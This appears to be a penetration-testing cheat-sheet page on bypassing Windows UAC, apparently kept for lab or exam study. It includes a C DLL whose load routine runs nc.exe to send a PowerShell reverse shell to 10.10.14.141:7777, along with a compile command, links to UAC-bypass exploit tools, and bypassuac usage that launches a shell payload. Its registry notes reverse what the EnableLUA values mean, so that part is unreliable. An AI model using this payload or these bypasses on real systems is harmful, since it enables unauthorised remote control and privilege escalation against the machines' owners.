Skip to content

Bypass UAC

  • UAC Bypass requires administrator account

  • UAC bypass required if shell is giving administrator access denied

  • Requires an interactive shell

    • ncat does not work.
    • Use a metasploit shell and attach to explorer or another process with a 1 (for interactive) in the 'ps' list (seen after getting a metasploit shell).

  • Typically required for applications to launch a gui

  • UAC bypasses

    • https://github.com/hfiref0x/UACME
    • net use x: \127.0.0.1\c$

  • Helpful post on understanding UAC settings

    • https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
UAC Bypass dll
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        WinExec("C:\\Users\\batman\\nc.exe 10.10.14.141 7777 -e powershell", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        return 0;
}

Compile with: i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared

Check if UAC is on
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLUA - 0 = UAC enabled, no bypass needed, can PsExec to SYSTEM - 1 = UAC disabled, need to check the other 2 keys - ConsentPromptBehaviorAdmin - Can take on 6 different values - PromptOnSecureDesktop - Either 1 or 0 - If ConsentPromptBehaviorAdmin=2 & PromptOnSecureDesktop=1 then UAC bypass will not work - If ConsentPromptBehaviorAdmin=5 & PromptOnSecureDesktop=1 then UAC bypass will work

ConsentPromptBehaviorAdmin Values

Value Meaning
0x00000000 This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials.
0x00000001 This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop.
0x00000002 This option prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. This operation occurs on the secure desktop.
0x00000003 This option prompts the Consent Admin to enter his or her user name and password (or that of another valid admin) when an operation requires elevation of privilege.
0x00000004 This prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task.
0x00000005 This option is the default. It is used to prompt the administrator in Admin Approval Mode to select either "Permit" or "Deny" for an operation that requires elevation of privilege for any non-Windows binaries. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. This operation will happen on the secure desktop.

Eventvwr.exe UAC bypass

  • Works on Windows 7, 8, and 10. Does not work on Vista
  • Guide: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
  • Exploit in C (requires minimal editing) - https://github.com/turbo/zero2hero

Pre-made UAC bypass executables on Kali

  • bypassuac-x86.exe & bypassuac-x64.exe
  • Same limitations as eventvwr.exe UAC bypass
  • bypassuac-x**.exe /c C:\directory\to\shell4444.exe